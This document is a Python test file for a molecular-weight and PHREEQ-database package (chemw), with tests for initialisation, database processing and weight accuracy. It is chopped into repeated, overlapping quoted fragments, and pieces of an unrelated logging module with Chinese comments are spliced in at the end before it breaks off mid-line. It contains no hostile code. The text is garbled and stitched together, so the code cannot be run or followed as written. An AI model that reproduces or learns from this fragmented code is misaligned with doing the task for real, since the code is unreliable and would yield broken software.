re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert", "[db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb()", "chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end,", "zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process", "from shutil import rmtree from math import isclose from glob import glob import", "print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path)", "tolerance): assert False else: assert True # affirm that iterated entities are zero", "the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in", "[chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate", "# output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n',", "import re, os def test_inits(): # import the class modules chem_mw = chemw.ChemMW()", "print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents", "the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance", "<reponame>freiburgermsu/WCMpy<gh_stars>0 from pandas import DataFrame from shutil import rmtree from math import isclose", "isclose from glob import glob import chemw import re, os def test_inits(): #", "for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical)", "# calculate the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)':", "db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame #", "for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def", "test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol", "phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for", "for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3,", "tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance):", "not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True # affirm", "test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4':", "in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the", "for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for", "output folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json'", "for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output", "'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } #", "chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol =", "'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ':", "chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases", "MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals:", "phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) #", "= re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is", "glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases:", "for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): #", "known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O':", "assert False else: assert True # affirm that iterated entities are zero for", "99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert", "'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for", "# verify the output folder and its contents for db in phreeq_databases: json_name", "= chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]:", "if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True #", "DataFrame from shutil import rmtree from math import isclose from glob import glob", "# calculate the MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for", "calculate the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7,", "calculate the MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical", "assert True # affirm that iterated entities are zero for zero in [chem_mw.groups,", "phreeq_db.process(db) # verify the output folder and its contents for db in phreeq_databases:", "# process the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] #", "517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate", "# affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]:", "MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6,", "chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9%", "127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O':", "chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases", "pandas import DataFrame from shutil import rmtree from math import isclose from glob", "0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db", "PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__),", "assert zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases =", "glob import chemw import re, os def test_inits(): # import the class modules", "'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary", "test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd())", "'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the", "{ 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O':", "the MW for the dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in", "phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db", "= chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert", "chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the", "os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db))", "714.4 } # calculate the MW for the dictionary of chemicals chem_mw =", "the PHREEQ databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path =", "json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the directory", "chemw import re, os def test_inits(): # import the class modules chem_mw =", "zero == 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db", "of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001", "databases phreeq_databases = [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb')", "chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert", "output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(),", "verify the output folder and its contents for db in phreeq_databases: json_name =", "= tolerance): assert False else: assert True # affirm that iterated entities are", "the output folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',", "from glob import glob import chemw import re, os def test_inits(): # import", "db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is", "assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the directory rmtree(phreeq_db.output_path)", "shutil import rmtree from math import isclose from glob import glob import chemw", "True # affirm that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer,", "in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str", "= chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy", "rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals", "its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name))", "import glob import chemw import re, os def test_inits(): # import the class", "bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of known MW", "TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy():", "def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb()", "= [db for db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db =", "assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals", "328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the", "folder and its contents for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert", "def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for db in", "chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 #", "re, os def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db", "chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if", "for db in phreeq_databases: json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name)", "def test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals =", "from math import isclose from glob import glob import chemw import re, os", "rel_tol = tolerance): assert False else: assert True # affirm that iterated entities", "import chemw import re, os def test_inits(): # import the class modules chem_mw", "glob import glob import chemw import re, os def test_inits(): # import the", "# 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else:", "import rmtree from math import isclose from glob import glob import chemw import", "db in glob('databases/*.dat')] # output_path = os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db", "else: assert True # affirm that iterated entities are zero for zero in", "'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4,", "'='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for db in", "'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for db", "for chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not", "re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its contents for", "chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW", "# import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for", "re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame", "dictionary of chemicals chem_mw = chemw.ChemMW() for chemical in test_chemicals: chem_mw.mass(chemical) tolerance =", "664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW", "chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool", "phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF)", "chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O':", "'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4", "': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 } # calculate the MW for the dictionary of", "in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical],", "chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False", "iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero ==", "in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): #", "= chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify", "rmtree from math import isclose from glob import glob import chemw import re,", "[chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def test_phreeq_db(): # process the PHREEQ", "= { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8,", "= chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is", "that iterated entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero" ]
[]
[ "xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b, split(r\"\\\\|/\", ph)))", "import expanduser from os import sep from re import split from functools import", "sep from re import split from functools import reduce from xmtrace import xmtrace", "import split from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua,", "os.path import expanduser from os import sep from re import split from functools", "import sep from re import split from functools import reduce from xmtrace import", "import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a,", "@xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b,", "functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda", "xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a +", "reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b:", "from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return", "def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep + b, split(r\"\\\\|/\",", "os import sep from re import split from functools import reduce from xmtrace", "import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep", "from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a", "xmtrace @xmtrace def xm_path_translate(lua, ph): return expanduser(reduce(lambda a, b: a + sep +", "from re import split from functools import reduce from xmtrace import xmtrace @xmtrace", "from os.path import expanduser from os import sep from re import split from", "re import split from functools import reduce from xmtrace import xmtrace @xmtrace def", "from os import sep from re import split from functools import reduce from", "split from functools import reduce from xmtrace import xmtrace @xmtrace def xm_path_translate(lua, ph):", "expanduser from os import sep from re import split from functools import reduce" ]
[ "= radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi", "self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter =", "perimeter of a circle. import math class circle: def area1(self,radius): self.radius = radius", "named Circle constructed by a radius and two methods #which will compute the", "compute the area and the perimeter of a circle. import math class circle:", "#Write a Python class named Circle constructed by a radius and two methods", "<filename>Class-Example/CLASS_REPRACTRICED.py #Write a Python class named Circle constructed by a radius and two", "by a radius and two methods #which will compute the area and the", "math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius):", "methods #which will compute the area and the perimeter of a circle. import", "circle. import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area)", "Python class named Circle constructed by a radius and two methods #which will", "radius and two methods #which will compute the area and the perimeter of", "will compute the area and the perimeter of a circle. import math class", "area and the perimeter of a circle. import math class circle: def area1(self,radius):", "area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter) circle().area1(6)", "class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius", "def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius", "and two methods #which will compute the area and the perimeter of a", "and the perimeter of a circle. import math class circle: def area1(self,radius): self.radius", "#which will compute the area and the perimeter of a circle. import math", "area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter", "two methods #which will compute the area and the perimeter of a circle.", "radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter)", "of a circle. import math class circle: def area1(self,radius): self.radius = radius area=", "circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius =", "the perimeter of a circle. import math class circle: def area1(self,radius): self.radius =", "a Python class named Circle constructed by a radius and two methods #which", "Circle constructed by a radius and two methods #which will compute the area", "a radius and two methods #which will compute the area and the perimeter", "class named Circle constructed by a radius and two methods #which will compute", "radius*radius*math.pi print(area) def perimeter2(self,radius): self.radius = radius perimeter = radius*2*math.pi print(perimeter) circle().area1(6) circle().perimeter2(6)", "constructed by a radius and two methods #which will compute the area and", "the area and the perimeter of a circle. import math class circle: def", "a circle. import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi", "import math class circle: def area1(self,radius): self.radius = radius area= radius*radius*math.pi print(area) def" ]
[ "def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if", "logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level <", "error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger =", "= logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler()", "INFO) logger.debug('this is a debug message') logger.info('this is a info message') logger.warn('this is", "level < CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level]", "dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir)", "logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG: level", "= Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info message')", "utf-8 -*- import os import logging import logging.handlers CRITICAL = 1 ERROR =", "CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir", "if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')", "logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message):", "logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh)", "# -*- coding: utf-8 -*- import os import logging import logging.handlers CRITICAL =", "Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING:", "= dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir):", "if level < CRITICAL or level > DEBUG: level = DEBUG logLevel =", "ERROR = 2 WARNING = 3 INFO = 4 DEBUG = 5 class", "dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG", "logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not", "-*- import os import logging import logging.handlers CRITICAL = 1 ERROR = 2", "os import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING =", "sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt)", "1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG = 5", "self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug", "= { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG }", "coding: utf-8 -*- import os import logging import logging.handlers CRITICAL = 1 ERROR", "self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel)", "os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh", "= 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel =", "4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = {", "logger.debug('this is a debug message') logger.info('this is a info message') logger.warn('this is a", "> DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName)", "def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def", "# mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger", "= 3 INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName,", "INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG:", "self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message)", "message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ ==", "INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel", "# 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024,", "3 INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG):", "os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt", "def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def", "abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir)", "import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 INFO =", "%(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName,", "fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def", "os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s]", "class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR,", "= DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath)", "def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this", "= logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel)", "__name__ == \"__main__\": logger = 